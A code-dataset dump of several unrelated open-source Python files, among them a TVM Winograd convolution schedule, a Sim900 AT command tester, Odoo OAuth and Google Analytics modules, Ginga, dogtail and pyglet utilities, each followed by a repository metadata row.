tvm.select(b * bnb + bb < P,\
data_pad[(b*bnb+bb) // (nH*nW)][c][(b*bnb+bb) // nW % nH * m + eps]\
[(b*bnb+bb) % nW * m + nu], tvm.const(0, data_pad.dtype)),
name='d')
# transform kernel
G = const_array(G_data, 'G')
r_kh = tvm.reduce_axis((0, KH), 'r_kh')
r_kw = tvm.reduce_axis((0, KW), 'r_kw')
U = tvm.compute((alpha, alpha, K // bna, C, bna), lambda eps, nu, k, c, kk:
tvm.sum(kernel[k * bna + kk][c][r_kh][r_kw] * G[eps][r_kh] * G[nu][r_kw],
axis=[r_kh, r_kw]), name='U')
# transform image
B = const_array(B_data, 'B')
r_eps = tvm.reduce_axis((0, alpha), 'r_eps')
r_nu = tvm.reduce_axis((0, alpha), 'r_nu')
V = tvm.compute((alpha, alpha, P_round // bnb, C, bnb), lambda eps, nu, b, c, bb:
tvm.sum(input_tile[c][b][r_eps][r_nu][bb] * B[r_eps][eps] * B[r_nu][nu],
axis=[r_eps, r_nu]), name='V')
# batch gemm
c = tvm.reduce_axis((0, C), name='c')
M = tvm.compute((alpha, alpha, K, P_round), lambda eps, nu, k, b:
tvm.sum(U[eps][nu][k // bna][c][k % bna] *
V[eps][nu][b // bnb][c][b % bnb], axis=c), name='M')
# inverse transform
A = const_array(A_data, 'A')
r_eps = tvm.reduce_axis((0, alpha), 'r_eps')
r_nu = tvm.reduce_axis((0, alpha), 'r_nu')
Y = tvm.compute((K, P, m, m), lambda k, b, vh, vw:
tvm.sum(M[r_eps][r_nu][k][b] * A[r_eps][vh] * A[r_nu][vw],
axis=[r_eps, r_nu]), name='Y')
# unpack output
output = tvm.compute((N, K, H, W), lambda n, k, h, w:
Y[k][n * nH * nW + (h//m) * nW + w//m][h % m][w % m]
# thw following term is used to make the padding effective,
# otherwise the padding will be eliminated by bound inference
+ tvm.const(0, out_dtype) * M[alpha-1][alpha-1][K-1][P_round-1],
name='output', tag='winograd_conv_output')
return output
def _schedule_winograd(s, op):
"""schedule winograd fast convolution F(2x2, 3x3) for conv2d"""
# get ops and tensors
output = op.output(0)
Y = op.input_tensors[0]
M, A = s[Y].op.input_tensors
U, V = s[M].op.input_tensors
kernel, G = s[U].op.input_tensors
d, B = s[V].op.input_tensors
data_pad = s[d].op.input_tensors[0]
data = s[data_pad].op.input_tensors[0]
# padding
s[data_pad].compute_inline()
# pack input tiles
c, b, eps, nu, bb = s[d].op.axis
s[d].reorder(eps, nu, bb)
aha = s[d].fuse(eps, nu)
s[d].unroll(bb)
tile_and_bind3d(s, d, c, b, aha, 4, 1, 1)
# transform kernel
s[G].compute_inline()
eps, nu, k, c, kk, = s[U].op.axis
r_kh, r_kw = s[U].op.reduce_axis
s[U].reorder(k, c, kk, eps, nu, r_kh, r_kw)
_ = [s[U].unroll(x) for x in [eps, nu, r_kh, r_kw]]
s[U].vectorize(kk)
tile_and_bind(s, U, k, c, 1, 256)
# transform image
s[B].compute_inline()
eps, nu, b, c, bb = s[V].op.axis
r_eps, r_nu = s[V].op.reduce_axis
s[V].reorder(b, c, bb, eps, nu, r_nu, r_eps)
_ = [s[V].unroll(x) for x in [eps, nu, r_eps, r_nu]]
s[V].vectorize(bb)
tile_and_bind(s, V, b, c, 2, 1)
# batch gemm
bna, bnb = 4, 4
if data.dtype == 'float16':
bnb *= 2
eps, nu, k, b = s[M].op.axis
c = s[M].op.reduce_axis[0]
yo, xo, yi, xi = s[M].tile(k, b, bna, bnb)
s[M].reorder(c, yi, xi)
c, c_unroll = s[M].split(c, 2)
s[M].unroll(c_unroll)
s[M].unroll(yi)
s[M].vectorize(xi)
z = s[M].fuse(eps, nu)
tile_and_bind3d(s, M, z, yo, xo, 1, 8, 1)
# inverse transform
s[A].compute_inline()
k, b, vh, vw = s[Y].op.axis
r_eps, r_nu = s[Y].op.reduce_axis
_ = [s[Y].unroll(x) for x in [vh, vw, r_eps, r_nu]]
tile_and_bind(s, Y, k, b, 4, 1)
# schedule output
if output.op in s.outputs: # no bias
output = output
else: # has bias
s[output].compute_inline()
output = s.outputs[0]
_, k, h, w = s[output].op.axis
tile_and_bind3d(s, output, k, h, w, 1, 2, 2)
| apache-2.0 | -604,978,453,412,319,400 | 32.467552 | 99 | 0.533692 | false |
UAA-EQLNES/ARTF-Data-Receiver | cmd_tester.py | 1 | 1328 | #! /usr/bin/env python
import argparse
from gpio import enableUart
from serial import Serial
from sim900 import Sim900
from time import sleep
def main():
parser = argparse.ArgumentParser(description='Run Sim900 AT Command Tester.')
parser.add_argument('-p', '--port', help='Serial port', default='/dev/ttyS1')
parser.add_argument('-b', '--baudrate', type=int, help='Baudrate of Sim900 GSM shield', default=115200)
args = parser.parse_args()
port = args.port
baudrate = args.baudrate
# Need to initalize gpio0 and gpio1 to UART mode if pcDuino.
# If not pcDuino, just ignore the error.
try:
enableUart()
except:
pass
sim900 = Sim900(Serial(port, baudrate, timeout = 10), delay=0.3)
# For non-pcDuino devices, there looks to be a delay before commands
# are sent and read correctly. Waiting two seconds seems to work.
print "Initializing serial connection..."
sleep(2)
print ""
print "Sim900 AT Command Tester"
print "------------------------"
print ""
print "Type 'exit' to end the program."
print ""
while True:
cmd = raw_input("Enter AT command: ")
if cmd == 'exit':
break
sim900.send_cmd(cmd)
print sim900.read_all()
if __name__ == '__main__':
main()
| unlicense | -2,414,242,593,420,755,500 | 26.102041 | 107 | 0.619729 | false |
ttfseiko/openerp-trunk | openerp/addons/auth_oauth/auth_oauth.py | 70 | 1057 | from openerp.osv import osv, fields
class auth_oauth_provider(osv.osv):
"""Class defining the configuration values of an OAuth2 provider"""
_name = 'auth.oauth.provider'
_description = 'OAuth2 provider'
_order = 'name'
_columns = {
'name' : fields.char('Provider name'), # Name of the OAuth2 entity, Google, LinkedIn, etc
'client_id' : fields.char('Client ID'), # Our identifier
'auth_endpoint' : fields.char('Authentication URL'), # OAuth provider URL to authenticate users
'scope' : fields.char('Scope'), # OAUth user data desired to access
'validation_endpoint' : fields.char('Validation URL'), # OAuth provider URL to validate tokens
'data_endpoint' : fields.char('Data URL'),
'enabled' : fields.boolean('Allowed'),
'css_class' : fields.char('CSS class'),
'body' : fields.char('Body'),
'sequence' : fields.integer(),
}
_defaults = {
'enabled' : False,
}
| agpl-3.0 | 50,888,191,929,221,530 | 43.041667 | 115 | 0.578051 | false |
googleapis/python-analytics-data | google/analytics/data_v1alpha/__init__.py | 1 | 3544 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .services.alpha_analytics_data import AlphaAnalyticsDataClient
from .services.alpha_analytics_data import AlphaAnalyticsDataAsyncClient
from .types.analytics_data_api import BatchRunPivotReportsRequest
from .types.analytics_data_api import BatchRunPivotReportsResponse
from .types.analytics_data_api import BatchRunReportsRequest
from .types.analytics_data_api import BatchRunReportsResponse
from .types.analytics_data_api import GetMetadataRequest
from .types.analytics_data_api import Metadata
from .types.analytics_data_api import RunPivotReportRequest
from .types.analytics_data_api import RunPivotReportResponse
from .types.analytics_data_api import RunRealtimeReportRequest
from .types.analytics_data_api import RunRealtimeReportResponse
from .types.analytics_data_api import RunReportRequest
from .types.analytics_data_api import RunReportResponse
from .types.data import Cohort
from .types.data import CohortReportSettings
from .types.data import CohortSpec
from .types.data import CohortsRange
from .types.data import DateRange
from .types.data import Dimension
from .types.data import DimensionExpression
from .types.data import DimensionHeader
from .types.data import DimensionMetadata
from .types.data import DimensionValue
from .types.data import Entity
from .types.data import Filter
from .types.data import FilterExpression
from .types.data import FilterExpressionList
from .types.data import Metric
from .types.data import MetricHeader
from .types.data import MetricMetadata
from .types.data import MetricValue
from .types.data import NumericValue
from .types.data import OrderBy
from .types.data import Pivot
from .types.data import PivotDimensionHeader
from .types.data import PivotHeader
from .types.data import PropertyQuota
from .types.data import QuotaStatus
from .types.data import ResponseMetaData
from .types.data import Row
from .types.data import MetricAggregation
from .types.data import MetricType
__all__ = (
"AlphaAnalyticsDataAsyncClient",
"AlphaAnalyticsDataClient",
"BatchRunPivotReportsRequest",
"BatchRunPivotReportsResponse",
"BatchRunReportsRequest",
"BatchRunReportsResponse",
"Cohort",
"CohortReportSettings",
"CohortSpec",
"CohortsRange",
"DateRange",
"Dimension",
"DimensionExpression",
"DimensionHeader",
"DimensionMetadata",
"DimensionValue",
"Entity",
"Filter",
"FilterExpression",
"FilterExpressionList",
"GetMetadataRequest",
"Metadata",
"Metric",
"MetricAggregation",
"MetricHeader",
"MetricMetadata",
"MetricType",
"MetricValue",
"NumericValue",
"OrderBy",
"Pivot",
"PivotDimensionHeader",
"PivotHeader",
"PropertyQuota",
"QuotaStatus",
"ResponseMetaData",
"Row",
"RunPivotReportRequest",
"RunPivotReportResponse",
"RunRealtimeReportRequest",
"RunRealtimeReportResponse",
"RunReportRequest",
"RunReportResponse",
)
| apache-2.0 | -6,338,435,351,210,538,000 | 32.433962 | 74 | 0.775395 | false |
rajul/ginga | ginga/util/toolbox.py | 3 | 2919 | #
# toolbox.py -- Goodies for enhancing a Ginga viewer
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
class ModeIndicator(object):
"""
This class adds a mode status indicator to a viewer's lower right-hand
corner.
Usage:
Instantiate this class with a Ginga ImageView{Toolkit} object as the
sole constructor argument. Save a reference to the mode indicator
object somewhere so it doesn't get collected.
"""
def __init__(self, viewer):
self.viewer = viewer
# set to false to disable
self.visible = True
# for displaying modal keyboard state
self.mode_obj = None
bm = viewer.get_bindmap()
bm.add_callback('mode-set', self.mode_change_cb)
viewer.add_callback('configure', self._configure_cb)
def mode_change_cb(self, bindmap, mode, modetype):
# delete the old indicator
obj = self.mode_obj
self.mode_obj = None
#canvas = self.viewer.get_canvas()
canvas = self.viewer.private_canvas
if obj:
try:
canvas.deleteObject(obj)
except:
pass
if not self.visible:
return True
# if not one of the standard modifiers, display the new one
if not mode in (None, 'ctrl', 'shift'):
Text = canvas.getDrawClass('text')
Rect = canvas.getDrawClass('rectangle')
Compound = canvas.getDrawClass('compoundobject')
if modetype == 'locked':
text = '%s [L]' % (mode)
else:
text = mode
xsp, ysp = 4, 6
wd, ht = self.viewer.get_window_size()
if self.viewer._originUpper:
x1, y1 = wd-12*len(text), ht-12
else:
# matplotlib case
x1, y1 = wd-12*len(text), 12
o1 = Text(x1, y1, text,
fontsize=12, color='yellow', coord='canvas')
wd, ht = self.viewer.renderer.get_dimensions(o1)
# yellow text on a black filled rectangle
if self.viewer._originUpper:
a1, b1, a2, b2 = x1-xsp, y1+ysp, x1+wd+xsp, y1-ht
else:
# matplotlib case
a1, b1, a2, b2 = x1-xsp, y1-ysp, x1+wd+2*xsp, y1+ht+ysp
o2 = Compound(Rect(a1, b1, a2, b2,
color='black', coord='canvas',
fill=True, fillcolor='black'),
o1)
self.mode_obj = o2
canvas.add(o2)
return True
def _configure_cb(self, view, width, height):
# redraw the mode indicator since the window has been resized
bm = view.get_bindmap()
mode, modetype = bm.current_mode()
self.mode_change_cb(bm, mode, modetype)
#END
| bsd-3-clause | -5,227,700,311,220,240,000 | 30.728261 | 74 | 0.539226 | false |
Affix/fas | fas/__init__.py | 4 | 1997 | # -*- coding: utf-8 -*-
#
# Copyright © 2008 Ricky Zhou
# Copyright © 2008 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details. You should have
# received a copy of the GNU General Public License along with this program;
# if not, write to the Free Software Foundation, Inc., 51 Franklin Street,
# Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat trademarks that are
# incorporated in the source code or documentation are not subject to the GNU
# General Public License and may only be used or replicated with the express
# permission of Red Hat, Inc.
#
# Author(s): Ricky Zhou <[email protected]>
# Mike McGrath <[email protected]>
#
from fas import release
__version__ = release.VERSION
import gettext
translation = gettext.translation('fas', '/usr/share/locale',
fallback=True)
_ = translation.ugettext
SHARE_CC_GROUP = 'share_country_code'
SHARE_LOC_GROUP = 'share_location'
class FASError(Exception):
'''FAS Error'''
pass
class ApplyError(FASError):
'''Raised when a user could not apply to a group'''
pass
class ApproveError(FASError):
'''Raised when a user could not be approved in a group'''
pass
class SponsorError(FASError):
'''Raised when a user could not be sponsored in a group'''
pass
class UpgradeError(FASError):
'''Raised when a user could not be upgraded in a group'''
pass
class DowngradeError(FASError):
'''Raised when a user could not be downgraded in a group'''
pass
class RemoveError(FASError):
'''Raised when a user could not be removed from a group'''
pass
| gpl-2.0 | -2,755,481,522,752,891,000 | 32.813559 | 79 | 0.722306 | false |
Lorquas/dogtail | dogtail/utils.py | 2 | 14664 | # -*- coding: utf-8 -*-
"""
Various utilities
Authors: Ed Rousseau <[email protected]>, Zack Cerza <[email protected], David Malcolm <[email protected]>
"""
__author__ = """Ed Rousseau <[email protected]>,
Zack Cerza <[email protected],
David Malcolm <[email protected]>
"""
import os
import sys
import subprocess
import cairo
import predicate
import errno
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gtk
from gi.repository import GObject
from config import config
from time import sleep
from logging import debugLogger as logger
from logging import TimeStamp
from __builtin__ import file
def screenshot(file='screenshot.png', timeStamp=True):
"""
This function wraps the ImageMagick import command to take a screenshot.
The file argument may be specified as 'foo', 'foo.png', or using any other
extension that ImageMagick supports. PNG is the default.
By default, screenshot filenames are in the format of foo_YYYYMMDD-hhmmss.png .
The timeStamp argument may be set to False to name the file foo.png.
"""
if not isinstance(timeStamp, bool):
raise TypeError("timeStampt must be True or False")
# config is supposed to create this for us. If it's not there, bail.
assert os.path.isdir(config.scratchDir)
baseName = ''.join(file.split('.')[0:-1])
fileExt = file.split('.')[-1].lower()
if not baseName:
baseName = file
fileExt = 'png'
if timeStamp:
ts = TimeStamp()
newFile = ts.fileStamp(baseName) + '.' + fileExt
path = config.scratchDir + newFile
else:
newFile = baseName + '.' + fileExt
path = config.scratchDir + newFile
from gi.repository import Gdk
from gi.repository import GObject
from gi.repository import GdkPixbuf
rootWindow = Gdk.get_default_root_window()
geometry = rootWindow.get_geometry()
pixbuf = GdkPixbuf.Pixbuf(colorspace=GdkPixbuf.Colorspace.RGB,
has_alpha=False,
bits_per_sample=8,
width=geometry[2],
height=geometry[3])
pixbuf = Gdk.pixbuf_get_from_window(rootWindow, 0, 0,
geometry[2], geometry[3])
# GdkPixbuf.Pixbuf.save() needs 'jpeg' and not 'jpg'
if fileExt == 'jpg':
fileExt = 'jpeg'
try:
pixbuf.savev(path, fileExt, [], [])
except GObject.GError:
raise ValueError("Failed to save screenshot in %s format" % fileExt)
assert os.path.exists(path)
logger.log("Screenshot taken: " + path)
return path
def run(string, timeout=config.runTimeout, interval=config.runInterval, desktop=None, dumb=False, appName=''):
"""
Runs an application. [For simple command execution such as 'rm *', use os.popen() or os.system()]
If dumb is omitted or is False, polls at interval seconds until the application is finished starting, or until timeout is reached.
If dumb is True, returns when timeout is reached.
"""
if not desktop:
from tree import root as desktop
args = string.split()
os.environ['GTK_MODULES'] = 'gail:atk-bridge'
pid = subprocess.Popen(args, env=os.environ).pid
if not appName:
appName = args[0]
if dumb:
# We're starting a non-AT-SPI-aware application. Disable startup
# detection.
doDelay(timeout)
else:
# Startup detection code
# The timing here is not totally precise, but it's good enough for now.
time = 0
while time < timeout:
time = time + interval
try:
for child in desktop.children[::-1]:
if child.name == appName:
for grandchild in child.children:
if grandchild.roleName == 'frame':
from procedural import focus
focus.application.node = child
doDelay(interval)
return pid
except AttributeError: # pragma: no cover
pass
doDelay(interval)
return pid
def doDelay(delay=None):
"""
Utility function to insert a delay (with logging and a configurable
default delay)
"""
if delay is None:
delay = config.defaultDelay
if config.debugSleep:
logger.log("sleeping for %f" % delay)
sleep(delay)
class Highlight (Gtk.Window): # pragma: no cover
def __init__(self, x, y, w, h): # pragma: no cover
super(Highlight, self).__init__()
self.set_decorated(False)
self.set_has_resize_grip(False)
self.set_default_size(w, h)
self.screen = self.get_screen()
self.visual = self.screen.get_rgba_visual()
if self.visual is not None and self.screen.is_composited():
self.set_visual(self.visual)
self.set_app_paintable(True)
self.connect("draw", self.area_draw)
self.show_all()
self.move(x, y)
def area_draw(self, widget, cr): # pragma: no cover
cr.set_source_rgba(.0, .0, .0, 0.0)
cr.set_operator(cairo.OPERATOR_SOURCE)
cr.paint()
cr.set_operator(cairo.OPERATOR_OVER)
cr.set_source_rgb(0.9, 0.1, 0.1)
cr.set_line_width(6)
cr.rectangle(0, 0, self.get_size()[0], self.get_size()[1])
cr.stroke()
class Blinker(object): # pragma: no cover
INTERVAL_MS = 1000
main_loop = GObject.MainLoop()
def __init__(self, x, y, w, h): # pragma: no cover
self.highlight_window = Highlight(x, y, w, h)
if self.highlight_window.screen.is_composited() is not False:
self.timeout_handler_id = GObject.timeout_add(
Blinker.INTERVAL_MS, self.destroyHighlight)
self.main_loop.run()
else:
self.highlight_window.destroy()
def destroyHighlight(self): # pragma: no cover
self.highlight_window.destroy()
self.main_loop.quit()
return False
class Lock(object):
"""
A mutex implementation that uses atomicity of the mkdir operation in UNIX-like
systems. This can be used by scripts to provide for mutual exlusion, either in single
scripts using threads etc. or i.e. to handle sitations of possible collisions among
multiple running scripts. You can choose to make randomized single-script wise locks
or a more general locks if you do not choose to randomize the lockdir name
"""
def __init__(self, location='/tmp', lockname='dogtail_lockdir_', randomize=True):
"""
You can change the default lockdir location or name. Setting randomize to
False will result in no random string being appened to the lockdir name.
"""
self.lockdir = os.path.join(os.path.normpath(location), lockname)
if randomize:
self.lockdir = "%s%s" % (self.lockdir, self.__getPostfix())
def lock(self):
"""
Creates a lockdir based on the settings on Lock() instance creation.
Raises OSError exception of the lock is already present. Should be
atomic on POSIX compliant systems.
"""
locked_msg = 'Dogtail lock: Already locked with the same lock'
if not os.path.exists(self.lockdir):
try:
os.mkdir(self.lockdir)
return self.lockdir
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(self.lockdir):
raise OSError(locked_msg)
else:
raise OSError(locked_msg)
def unlock(self):
"""
Removes a lock. Will raise OSError exception if the lock was not present.
Should be atomic on POSIX compliant systems.
"""
import os # have to import here for situations when executed from __del__
if os.path.exists(self.lockdir):
try:
os.rmdir(self.lockdir)
except OSError as e:
if e.erron == errno.EEXIST:
raise OSError('Dogtail unlock: lockdir removed elsewhere!')
else:
raise OSError('Dogtail unlock: not locked')
def __del__(self):
"""
Makes sure lock is removed when the process ends. Although not when killed indeed.
"""
self.unlock()
def __getPostfix(self):
import random
import string
return ''.join(random.choice(string.letters + string.digits) for x in range(5))
a11yDConfKey = 'org.gnome.desktop.interface'
def isA11yEnabled():
"""
Checks if accessibility is enabled via DConf.
"""
from gi.repository.Gio import Settings
InterfaceSettings = Settings(a11yDConfKey)
dconfEnabled = InterfaceSettings.get_boolean('toolkit-accessibility')
if os.environ.get('GTK_MODULES', '').find('gail:atk-bridge') == -1:
envEnabled = False
else:
envEnabled = True # pragma: no cover
return (dconfEnabled or envEnabled)
def bailBecauseA11yIsDisabled():
if sys.argv[0].endswith("pydoc"):
return # pragma: no cover
try:
if file("/proc/%s/cmdline" % os.getpid()).read().find('epydoc') != -1:
return # pragma: no cover
except: # pragma: no cover
pass # pragma: no cover
logger.log("Dogtail requires that Assistive Technology support be enabled."
"\nYou can enable accessibility with sniff or by running:\n"
"'gsettings set org.gnome.desktop.interface toolkit-accessibility true'\nAborting...")
sys.exit(1)
def enableA11y(enable=True):
"""
Enables accessibility via DConf.
"""
from gi.repository.Gio import Settings
InterfaceSettings = Settings(a11yDConfKey)
InterfaceSettings.set_boolean('toolkit-accessibility', enable)
def checkForA11y():
"""
Checks if accessibility is enabled, and halts execution if it is not.
"""
if not isA11yEnabled(): # pragma: no cover
bailBecauseA11yIsDisabled()
def checkForA11yInteractively(): # pragma: no cover
"""
Checks if accessibility is enabled, and presents a dialog prompting the
user if it should be enabled if it is not already, then halts execution.
"""
if isA11yEnabled():
return
from gi.repository import Gtk
dialog = Gtk.Dialog('Enable Assistive Technology Support?',
None,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
(Gtk.STOCK_QUIT, Gtk.ResponseType.CLOSE,
"_Enable", Gtk.ResponseType.ACCEPT))
question = """Dogtail requires that Assistive Technology Support be enabled for it to function. Would you like to enable Assistive Technology support now?
Note that you will have to log out for the change to fully take effect.
""".strip()
dialog.set_default_response(Gtk.ResponseType.ACCEPT)
questionLabel = Gtk.Label(label=question)
questionLabel.set_line_wrap(True)
dialog.vbox.pack_start(questionLabel, True, True, 0)
dialog.show_all()
result = dialog.run()
if result == Gtk.ResponseType.ACCEPT:
logger.log("Enabling accessibility...")
enableA11y()
elif result == Gtk.ResponseType.CLOSE:
bailBecauseA11yIsDisabled()
dialog.destroy()
class GnomeShell(object): # pragma: no cover
"""
Utility class to help working with certain atributes of gnome-shell.
Currently that means handling the Application menu available for apps
on the top gnome-shell panel. Searching for the menu and its items is
somewhat tricky due to fuzzy a11y tree of gnome-shell, mainly since the
actual menu is not present as child to the menu-spawning button. Also,
the menus get constructed/destroyed on the fly with application focus
changes. Thus current application name as displayed plus a reference
known menu item (with 'Quit' as default) are required by these methods.
"""
def __init__(self, classic_mode=False):
from tree import root
self.shell = root.application('gnome-shell')
def getApplicationMenuList(self, search_by_item='Quit'):
"""
Returns list of all menu item nodes. Searches for the menu by a reference item.
Provide a different item name, if the 'Quit' is not present - but beware picking one
present elsewhere, like 'Lock' or 'Power Off' present under the user menu.
"""
matches = self.shell.findChildren(
predicate.GenericPredicate(name=search_by_item, roleName='label'))
for match in matches:
ancestor = match.parent.parent.parent
if ancestor.roleName == 'panel':
return ancestor.findChildren(predicate.GenericPredicate(roleName='label'))
from tree import SearchError
raise SearchError("Could not find the Application menu based on '%s' item. Please provide an existing reference item"
% search_by_item)
def getApplicationMenuButton(self, app_name):
"""
Returns the application menu 'button' node as present on the gnome-shell top panel.
"""
try:
return self.shell[0][0][3].child(app_name, roleName='label')
except:
from tree import SearchError
raise SearchError(
"Application menu button of %s could not be found within gnome-shell!" % app_name)
def getApplicationMenuItem(self, item, search_by_item='Quit'):
"""
Returns a particilar menu item node. Uses a different 'Quit' or custom item name for reference, but also
attempts to use the given item if the general reference fails.
"""
try:
menu_items = self.getApplicationMenuList(search_by_item)
except:
menu_items = self.getApplicationMenuList(item)
for node in menu_items:
if node.name == item:
return node
raise Exception(
'Could not find the item, did application focus change?')
def clickApplicationMenuItem(self, app_name, item, search_by_item='Quit'):
"""
Executes the given menu item through opening the menu first followed
by a click at the particular item. The menu search reference 'Quit'
may be customized. Also attempts to use the given item for reference
if search fails with the default/custom one.
"""
self.getApplicationMenuButton(app_name).click()
self.getApplicationMenuItem(item, search_by_item).click()
| gpl-2.0 | 6,725,907,460,787,986,000 | 36.218274 | 158 | 0.628819 | false |
nemesiscodex/sugar | tests/views/activitieslist.py | 11 | 1715 | # Copyright (C) 2013, Daniel Narvaez
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
from gi.repository import Gtk
from dbus.mainloop.glib import DBusGMainLoop
DBusGMainLoop(set_as_default=True)
from jarabe.desktop.activitieslist import ActivityListPalette
tests_dir = os.getcwd()
base_dir = os.path.dirname(tests_dir)
data_dir = os.path.join(tests_dir, "data")
class MockActivityInfo:
def get_bundle_id(self):
return "mock"
def get_activity_version(self):
return 1
def get_is_favorite(self):
return False
def get_icon(self):
return os.path.join(data_dir, "activity.svg")
def get_name(self):
return "mock"
def get_path(self):
return "mock"
def is_user_activity(self):
return True
os.environ["SUGAR_ACTIVITIES_DEFAULTS"] = \
os.path.join(base_dir, "data", "activities.defaults")
os.environ["SUGAR_MIME_DEFAULTS"] = \
os.path.join(base_dir, "data", "mime.defaults")
palette = ActivityListPalette(MockActivityInfo())
palette.popup()
Gtk.main()
| gpl-2.0 | 5,076,711,548,262,022,000 | 26.66129 | 76 | 0.714869 | false |
dbarsam/python-vsgen | tests/integration/test_package_integration.py | 1 | 2129 | # -*- coding: utf-8 -*-
"""
This module provides all integration test for the package functionality.
"""
import sys
import os
import importlib
import shutil
import unittest
import logging
def setUpModule():
"""
The module specific setUp method
"""
logging.disable(logging.CRITICAL)
def tearDownModule():
"""
The module specific tearDown method
"""
logging.disable(logging.NOTSET)
class TestIntegrationPackage(unittest.TestCase):
"""
Tests the Solution and Project Generation from a python package file.
"""
def setUp(self):
"""
The class specific setUp method
"""
self._data = os.path.normpath(os.path.join(os.path.dirname(__file__), '..', 'data'))
self.assertTrue(os.path.isdir(self._data), 'Test data directory "{}" does not exist'.format(self._data))
self._output = os.path.normpath(os.path.join(self._data, '_output'))
self.assertFalse(os.path.exists(self._output), 'Test output directory already exits!'.format(self._output))
self._package = os.path.normpath(os.path.join(self._data, 'vsgendemo'))
self.assertTrue(os.path.isdir(self._package), 'Test package "{}" does not exist'.format(self._package))
# Append the to the sys path
rootdir = os.path.dirname(self._package)
if rootdir not in sys.path:
sys.path.append(rootdir)
def tearDown(self):
"""
The class specific tearDown method
"""
# Remove the package from the sys path
rootdir = os.path.dirname(self._package)
if rootdir in sys.path:
sys.path.remove(rootdir)
# Remove the output directory
if os.path.exists(self._output):
shutil.rmtree(self._output)
def test_package_success(self):
"""
Tests the expected workflow.
"""
package_name = os.path.basename(self._package)
main_module = importlib.import_module("{}.__main__".format(package_name))
result = main_module.main()
self.assertEqual(result, 0)
if __name__ == '__main__':
unittest.main()
| mit | 1,753,113,812,343,618,000 | 27.77027 | 115 | 0.622828 | false |
regular/pyglet-avbin-optimizations | pyglet/gl/glu_info.py | 5 | 5637 | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Information about version and extensions of current GLU implementation.
Usage::
from pyglet.gl import glu_info
if glu_info.have_extension('GLU_EXT_nurbs_tessellator'):
# ...
If multiple contexts are in use you can use a separate GLUInfo object for each
context. Call `set_active_context` after switching to the desired context for
each GLUInfo::
from pyglet.gl.glu_info import GLUInfo
info = GLUInfo()
info.set_active_context()
if info.have_version(1, 3):
# ...
Note that GLUInfo only returns meaningful information if a context has been
created.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from ctypes import *
import warnings
from pyglet.gl.glu import *
class GLUInfo(object):
'''Information interface for the GLU library.
A default instance is created automatically when the first OpenGL context
is created. You can use the module functions as a convenience for
this default instance's methods.
If you are using more than one context, you must call `set_active_context`
when the context is active for this `GLUInfo` instance.
'''
have_context = False
version = '0.0.0'
extensions = []
_have_info = False
def set_active_context(self):
'''Store information for the currently active context.
This method is called automatically for the default context.
'''
self.have_context = True
if not self._have_info:
self.extensions = \
cast(gluGetString(GLU_EXTENSIONS), c_char_p).value.split()
self.version = cast(gluGetString(GLU_VERSION), c_char_p).value
self._have_info = True
def have_version(self, major, minor=0, release=0):
'''Determine if a version of GLU is supported.
:Parameters:
`major` : int
The major revision number (typically 1).
`minor` : int
The minor revision number.
`release` : int
The release number.
:rtype: bool
:return: True if the requested or a later version is supported.
'''
if not self.have_context:
warnings.warn('No GL context created yet.')
ver = '%s.0.0' % self.version.split(' ', 1)[0]
imajor, iminor, irelease = [int(v) for v in ver.split('.', 3)[:3]]
return imajor > major or \
(imajor == major and iminor > minor) or \
(imajor == major and iminor == minor and irelease >= release)
